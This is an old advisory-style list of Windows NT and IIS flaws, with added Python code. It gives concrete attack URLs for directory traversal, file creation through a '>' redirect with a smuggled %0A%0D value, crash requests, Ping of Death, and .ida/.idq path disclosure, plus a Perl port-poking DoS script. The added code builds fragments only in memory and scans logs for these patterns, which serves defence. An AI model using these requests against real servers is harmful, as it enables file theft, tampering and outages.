Affected systems: 4.0, IIS 1.06
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):
/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";    # Perl 4 era socket helper providing chat::open_port, chat::print and chat::close

$systemname = shift @ARGV;                     # host to test, given on the command line
die "usage: perl poke servername\n" unless $systemname;
$verbose = 1;       # tell me what you're hitting
$knownports = 1;    # don't hit known problem ports (53, 135, 1031)

for ($port = 1; $port < 65535; $port++)        # port 0 is not a valid TCP port, so start at 1
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port); # returns undef when nothing is listening
    next unless $fh;
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername
--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

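As an added illustration (this code is not from the original post): the reason an echo request of 65527 data bytes is dangerous is that, with the 8-byte ICMP header and the 20-byte IP header, the reassembled datagram would be 65555 bytes, more than the 65535-byte maximum the 16-bit IP total-length field can express. Nothing in a fragment header stops a sender from picking an offset and length whose sum passes that limit, so a reassembler that trusts them and copies into a fixed 65535-byte buffer writes past its end, which is the failure the post attributes to TCPIP.SYS. The Python below builds that fragment set in memory only (it sends nothing) and shows the bounds check a reassembler needs. The `Fragment` class, the `strict` flag and the filler byte are this example's own choices, and the ICMP checksum is deliberately left at zero.

```python
from dataclasses import dataclass

MAX_DATAGRAM = 65535                        # largest value the 16-bit IP total-length field can hold
IP_HEADER_LEN = 20                          # assumed fixed IPv4 header with no options
MAX_PAYLOAD = MAX_DATAGRAM - IP_HEADER_LEN  # 65515 bytes of payload fit in one datagram

# Constructed 8-byte ICMP echo request header: type 8, code 0, checksum left zero, id 1, seq 1.
ICMP_ECHO_HEADER = bytes([8, 0, 0, 0, 0, 1, 0, 1])


def build_echo(data_len):
    """Return the ICMP echo request (header plus data_len filler bytes) that PING -l data_len sends."""
    return ICMP_ECHO_HEADER + b"\x41" * data_len


@dataclass
class Fragment:
    offset: int     # fragment offset field, in 8-byte units (13 bits, so at most 8191)
    more: bool      # the MF flag: True on every fragment except the last
    payload: bytes


def fragment(payload, mtu=1500):
    """Split a payload into IP fragments the way a sender with the given MTU would."""
    chunk = (mtu - IP_HEADER_LEN) // 8 * 8      # fragment data lengths must be multiples of 8
    return [Fragment(i // 8, i + chunk < len(payload), payload[i:i + chunk])
            for i in range(0, len(payload), chunk)]


def reassemble(frags, strict=True):
    """Reassemble fragments into the original payload, or return None if the set is incomplete.

    A fragment's end is offset*8 + len(payload). With strict=True a fragment ending beyond
    MAX_PAYLOAD is rejected; with strict=False the buffer is grown instead, which is the
    point at which a fixed-size C buffer would have been overrun."""
    buf = bytearray(MAX_PAYLOAD)
    total, received = None, 0
    for f in frags:
        start = f.offset * 8
        end = start + len(f.payload)
        if end > MAX_PAYLOAD:
            if strict:
                raise ValueError(f"fragment ends at byte {end}, beyond the {MAX_PAYLOAD}-byte limit")
            buf.extend(b"\0" * (end - len(buf)))
        buf[start:end] = f.payload
        received += len(f.payload)
        if not f.more:
            total = end                # the last fragment fixes the datagram length
    if total is None or received < total:
        return None
    return bytes(buf[:total])


if __name__ == "__main__":
    for data_len in (56, 65507, 65527):
        frags = fragment(build_echo(data_len))
        try:
            print(f"PING -l {data_len}: reassembled {len(reassemble(frags))} bytes OK")
        except ValueError as err:
            print(f"PING -l {data_len}: rejected, {err}")
```

Run as a script it accepts the default 56-byte ping and the largest legal one (65507 data bytes, exactly 65515 bytes of IP payload) and rejects the 65527-byte request from the post; passing `strict=False` to `reassemble` shows the same fragment set producing a 65535-byte payload that no IP datagram could legitimately carry.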
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service against the server). Vulnerable are all IIS versions up to and including IIS 5.0. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and of the directory structure of the server.
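Every request shape in this post is visible in the web server's own log, so a detection pass over IIS logs is the natural check. The Python below is an added example, not code from the original post: it classifies the `..\` traversal and `GET ../..` requests, the `>` redirection appended to a /scripts request, the %0A%0D sequence smuggled into a path, oversized `.ida` URLs, and `.ida`/`.idq` requests for files that do not exist (the path-disclosure probe). The log lines are constructed for the example in a simplified W3C layout (date, time, client IP, method, URI stem, status), and the `LONG_IDA` length threshold is an assumption to tune for your own site.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (date time c-ip cs-method cs-uri-stem sc-status); not from any real server.
SAMPLE_LOG = "\n".join([
    "1998-03-01 10:00:01 10.0.0.5 GET /index.htm 200",
    "1998-03-01 10:00:02 10.0.0.9 GET /..\\..\\winnt\\repair\\sam._ 200",
    "1998-03-01 10:00:03 10.0.0.9 GET /scripts..\\..\\scriptname 200",
    "1998-03-01 10:00:04 10.0.0.9 GET /scripts/exploit.bat>c:\\target.bat 200",
    "1998-03-01 10:00:05 10.0.0.9 GET /scripts/script_name%0A%0D>c:\\target.bat 200",
    "1998-03-01 10:00:06 10.0.0.7 GET /anything.idq 404",
    "1998-03-01 10:00:07 10.0.0.7 GET /" + "." * 300 + ".ida 500",
    "1998-03-01 10:00:08 10.0.0.5 GET /docs/../index.htm 200",
])

LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
LONG_IDA = 200   # assumed threshold: .ida/.idq stems longer than this are flagged as oversized


def escapes_root(stem):
    """True if the decoded path climbs above the content root; backslashes count as separators
    because IIS on NT accepts both kinds of slash."""
    depth = 0
    for seg in unquote(stem).replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(stem, status):
    """Return the names of every rule the request matches (an empty list means it looks benign)."""
    decoded = unquote(stem)
    hits = []
    if "..\\" in decoded:
        hits.append("backslash-traversal")      # '..\' never appears in a legitimate IIS URL
    if escapes_root(stem):
        hits.append("root-escape")              # path resolves outside the content root
    if decoded.lower().startswith("/scripts") and ">" in decoded:
        hits.append("shell-redirect")           # output redirection appended to a script request
    if "\r" in decoded or "\n" in decoded:
        hits.append("crlf-in-path")             # %0A/%0D decoded into the path
    if decoded.lower().endswith((".ida", ".idq")):
        if len(stem) > LONG_IDA:
            hits.append("long-ida-request")     # oversized .ida URL (crash or directory disclosure)
        elif status == 404:
            hits.append("idq-path-probe")       # missing .ida/.idq file leaks the physical path
    return hits


def scan_log(text):
    """Return (line_number, uri_stem, rules) for every log line matching at least one rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue                            # header, comment or truncated entry
        stem, status = m.group(5), int(m.group(6))
        rules = classify(stem, status)
        if rules:
            findings.append((n, stem, rules))
    return findings


if __name__ == "__main__":
    for n, stem, rules in scan_log(SAMPLE_LOG):
        print(f"line {n}: {stem[:40]!r} -> {', '.join(rules)}")
```

Note that `/docs/../index.htm` is left alone: `..` that stays inside the content root is ordinary path normalization, while the `scripts..\..\scriptname` form from the post is caught by the backslash rule even though it never leaves the root on paper. A `.ida` or `.idq` request is only reported when the file is missing or the URL is oversized, so a site that legitimately serves Index Server queries does not flood the output.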